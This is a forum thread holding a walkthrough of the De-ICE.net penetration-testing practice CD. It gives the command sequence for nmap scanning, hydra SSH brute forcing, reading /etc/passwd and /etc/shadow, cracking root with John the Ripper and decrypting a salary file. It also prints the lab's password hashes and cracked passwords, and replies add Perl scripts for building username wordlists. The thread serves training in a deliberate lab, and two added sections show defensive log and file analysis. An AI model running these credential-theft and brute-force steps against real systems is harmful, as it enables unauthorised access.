Thread: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

    De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
    NOT DISK 2
    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
    Download video: http://www.mediafire.com/?994f2o5ekdqqpzm



    What is this?
    This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.
    The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



    What do I need?

    > BackTrack 4 (Final)
    > de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
    > Dictionary(s)




    Software
    Name: De-ICE.net
    Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
    Home Page: http://www.de-ice.net or http://heorot.net/livecds/
    Download Link:


    Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
    WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks




    Commands:
    Code:
     nmap -n 192.168.1.1-255
    
    nmap -n -sS -sV -O 192.168.1.100
    
    firefox 192.168.1.100
    
    [+]kate -> make list of possible usernames. Save. Filename: usernames
    // lastF, fLast
    
    hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
    
    ssh bbanter@192.168.1.100
    // "Yes" if quiz about trusting authenticity. Password: bbanter
    
    cd /etc/
    
    cat passwd
    
    [+]kate -> Update usernames. Save.
    
    cat group
    
    exit
    
    cd /root/tools/dictionary/
    
    cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
    
    hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
    
    ssh aadams@192.168.1.100
    // Password: nostradamus
    
    cd /etc/
    
    sudo cat shadow
    // Password: nostradamus
    
    [+]kate -> New -> Paste -> Save. Filename: shadow
    
    exit
    
    john
    
    ./john --rules --wordlist=/root/passwords --users=root /root/shadow
    // Password: tarot
    
    ssh aadams@192.168.1.100
    // Password: nostradamus
    
    su
    // Password: tarot
    
    ls -a
    
    cd ..
    
    ls -a
    
    cd ftp/
    
    ls -a
    
    cd incoming/
    
    ls -a
    
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    
    cd /etc/
    
    vi vsftpd.conf
    // edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
    
    modprobe capability
    
    exit
    
    exit
    
    ftp 192.168.1.100
    // User: root. Password: tarot
    
    ls -a
    
    cd ..
    
    ls -a
    
    cd home
    
    ls -a
    
    cd ftp
    
    ls -a
    
    cd incoming
    
    ls -a
    
    get salary.csv
    
    cd /pentest/passwords/jtr
    
    ls
    
    mv salary.csv ~
    
    [+]kate -> salary.csv
    
    // GAME OVER
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
    aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
    bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
    ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
    ----------------------------------------------------------------------------------------------------
    Notes:
    Song: Aly & Fila - Khepera
    Video length: 04:11
    Capture length: 08:52

    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-1-disk-1.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1662-%5Bvideo%5D-de-ice-net-v1-1-1-100-%7Blevel-1-disk-2%7D.html OR http://heorot.net/forums/viewtopic.php?f=16&t=367
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Last edited by g0tmi1k; 03-06-2011 at 11:40 PM.
    Have you...g0tmi1k?
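
A defender's view of the two `hydra` runs in the walkthrough above, as an added example that is not part of the original post: the first run tries a couple of passwords against many usernames, the second tries many passwords against `aadams`, and the two leave different traces in the sshd log. The log lines, source addresses and thresholds below are constructed for illustration.

```python
import re
from collections import defaultdict

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?"
                    r"(?P<user>\S+) from (?P<src>\S+) port \d+")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted password for "
                      r"(?P<user>\S+) from (?P<src>\S+) port \d+")

def classify(log_text, spray_users=4, brute_attempts=5):
    """Map each source IP to the password-guessing patterns in its sshd lines."""
    fails = defaultdict(lambda: defaultdict(int))   # src -> user -> failures
    accepted = defaultdict(set)                     # src -> users that logged in
    for line in log_text.splitlines():
        if m := FAILED.search(line):
            fails[m["src"]][m["user"]] += 1
        elif m := ACCEPTED.search(line):
            accepted[m["src"]].add(m["user"])
    findings = {}
    for src, per_user in fails.items():
        found = []
        if len(per_user) >= spray_users:            # few guesses, many accounts
            found.append("username-spray")
        found += [f"single-user-brute-force:{u}"    # many guesses, one account
                  for u, n in sorted(per_user.items()) if n >= brute_attempts]
        if found:  # a success only matters once the source looks like a guesser
            found += [f"login-succeeded:{u}" for u in sorted(accepted[src])]
            findings[src] = found
    return findings

def sample_log():
    """Constructed sshd lines: a spray, a wordlist run, and one honest typo."""
    guesser, staff = "192.168.1.50", "192.168.1.20"   # assumed addresses
    events = [(guesser, u, False) for u in
              ("adamsa", "banterb", "coffeec", "ccoffee", "aadams")]
    events += [(guesser, "bbanter", True)]
    events += [(guesser, "aadams", False)] * 5 + [(guesser, "aadams", True)]
    events += [(staff, "ccoffee", False), (staff, "ccoffee", True)]
    lines = []
    for i, (src, user, ok) in enumerate(events):
        verb = "Accepted" if ok else "Failed"
        lines.append(f"Feb  1 10:00:{i:02d} target sshd[{2000 + i}]: "
                     f"{verb} password for {user} from {src} port {40000 + i} ssh2")
    return "\n".join(lines)

if __name__ == "__main__":
    for src, found in classify(sample_log()).items():
        print(src, found)
```

The single failed-then-successful login from the second address is deliberately not reported: a success is only attached to a source that already matches one of the guessing patterns.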

  2. #2
    Junior Member
    Join Date
    Apr 2010
    Location
    Sweden
    Posts
    35

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Good job. Thanks for submitting this. There's one of the last steps I don't understand though.

    Code:
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before?

    Would be grateful for an answer!

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by randalth0r View Post
    Good job. Thanks for submitting this. There's one of the last steps I don't understand though.

    Code:
    openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
    How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before?

    Would be grateful for an answer!
    Trial and error with a bit of googling
    and after JTR told me what it thought the root password was, I went with it.
    Have you...g0tmi1k?
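
An added example, not part of the thread: the output of `openssl enc` carries no cipher name, key length or mode, which is why the answer above comes down to trial and error. The sketch below reports what the container does expose (the `Salted__` magic, the salt, and which block sizes the ciphertext length is consistent with); the sample byte strings are constructed, not taken from `salary_dec2003.csv.enc`.

```python
import base64

MAGIC = b"Salted__"        # written by `openssl enc` when a password and salt are used
B64_MAGIC = b"U2FsdGVkX1"  # the same magic as it appears with -a / -base64 output

def inspect_openssl_enc(blob):
    """Return what the file container alone says about an `openssl enc` output."""
    info = {"base64": blob.lstrip().startswith(B64_MAGIC)}
    if info["base64"]:
        blob = base64.b64decode(blob)   # line breaks in the armour are ignored
    info["salted"] = blob.startswith(MAGIC)
    info["salt"] = None
    body = blob
    if info["salted"]:
        if len(blob) < 16:
            raise ValueError("magic present but the 8-byte salt is truncated")
        info["salt"] = blob[8:16].hex()
        body = blob[16:]
    info["ciphertext_len"] = len(body)
    # Padded block modes (e.g. CBC) emit whole blocks, so the length narrows the
    # block size. Nothing in the header names the cipher, key length or mode.
    info["possible_block_sizes"] = [b for b in (8, 16)
                                    if body and len(body) % b == 0]
    return info

# Constructed samples: fixed bytes standing in for salt and ciphertext.
SALT = bytes.fromhex("0102030405060708")
SAMPLE_16 = MAGIC + SALT + bytes(48)   # 48 bytes: fits 8- and 16-byte blocks
SAMPLE_8 = MAGIC + SALT + bytes(24)    # 24 bytes: rules out 16-byte block ciphers
SAMPLE_B64 = base64.encodebytes(SAMPLE_16)

if __name__ == "__main__":
    for name, blob in [("16", SAMPLE_16), ("8", SAMPLE_8), ("b64", SAMPLE_B64)]:
        print(name, inspect_openssl_enc(blob))
```

A length that is a multiple of 16 is consistent with AES but also with every 8-byte-block cipher, so the header narrows the candidates without identifying `-aes-128-cbc`.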

  4. #4
    Just burned his ISO
    Join Date
    May 2008
    Posts
    14

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by rshift View Post
    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?
    rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"

    g0tmi1k, I see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. Here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. there's probably a much easier way to code these but I'm new to perl and just did it for the challenge. I didn't bother using filehandles in the script to save output to a new file, u can just redirect it on the command line...


    One way to do it:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    
    while (<>) {
         print $_;
         chomp $_;
         $char=(chop $_);
         $str=$_;
         print "$char$str\n";
    }
    Another way:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    while (<>) {
    	print $_;
    	# length counts the trailing newline, so the last letter sits at length-2
    	$len = length $_;
    	$len = $len-2;
    	$last_letter = substr($_, $len, 1);
    	$first_letters = substr($_, 0, $len);
    	print "$last_letter$first_letters\n";
    }
    This will change the first letter of each word from upper to lowercase and vice versa.
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    while (<>) {
            print;
            @chars = split '', $_;
            $char = shift(@chars);
            if ($char =~ /[A-Za-z]/) {
                    $char =~ tr/A-Za-z/a-zA-Z/;
                    unshift(@chars, $char);
                    print @chars;
            } else {
            }
    }
    Last edited by mastodongle; 07-11-2010 at 06:04 PM.

  6. #6
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables

    Code:
    #! /usr/bin/perl
    # usage: perl <filename.pl> <userlist>
    while (<>) {
            s/(^\w)/\u$1/gi;
            print;
            s/(^\w)/\l$1/gi;
            print;
    }
    Last edited by micawber; 07-26-2010 at 04:51 PM.

  7. #7
    Just burned his ISO tyl3rs123's Avatar
    Join Date
    Aug 2010
    Posts
    7

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by g0tmi1k View Post
    Trial and error with a bit of googling
    and after JTR told me what it thought the root password was, I went with it.
    lol ??????? that is the magic ?

  8. #8
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}

    Quote Originally Posted by rshift View Post
    Nice work, I'm going to have a go at one of the disks once I get it downloaded.

    Where are those wordlists you found?
    I'm hosting them on my blog:
    g0tmi1k: [Site News] February Update - ISOs and Dictionaries

    Quote Originally Posted by mastodongle View Post
    rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"

    g0tmi1k, I see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. Here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. there's probably a much easier way to code these but I'm new to perl and just did it for the challenge. I didn't bother using filehandles in the script to save output to a new file, u can just redirect it on the command line...


    One way to do it:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    
    while (<>) {
         print $_;
         chomp $_;
         $char=(chop $_);
         $str=$_;
         print "$char$str\n";
    }
    Another way:
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    # moves last character of a word to the beginning.
    while (<>) {
    	print $_;
    	# length counts the trailing newline, so the last letter sits at length-2
    	$len = length $_;
    	$len = $len-2;
    	$last_letter = substr($_, $len, 1);
    	$first_letters = substr($_, 0, $len);
    	print "$last_letter$first_letters\n";
    }
    This will change the first letter of each word from upper to lowercase and vice versa.
    Code:
    #! /usr/bin/perl
    # Usage: perl <filename.pl> <userlist>
    while (<>) {
            print;
            @chars = split '', $_;
            $char = shift(@chars);
            if ($char =~ /[A-Za-z]/) {
                    $char =~ tr/A-Za-z/a-zA-Z/;
                    unshift(@chars, $char);
                    print @chars;
            } else {
            }
    }
    Thanks for helping out (with the links & script)
    Yeah, thinking about it. I should have created/used a script for the video. *I'll use them next time as I've added them to my collection!*


    Quote Originally Posted by micawber View Post
    mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables

    Code:
    #! /usr/bin/perl
    # usage: perl <filename.pl> <userlist>
    while (<>) {
            s/(^\w)/\u$1/gi;
            print;
            s/(^\w)/\l$1/gi;
            print;
    }
    Handy to know!


    Quote Originally Posted by tyl3rs123 View Post
    lol ??????? that is the magic ?
    Sure?
    Have you...g0tmi1k?
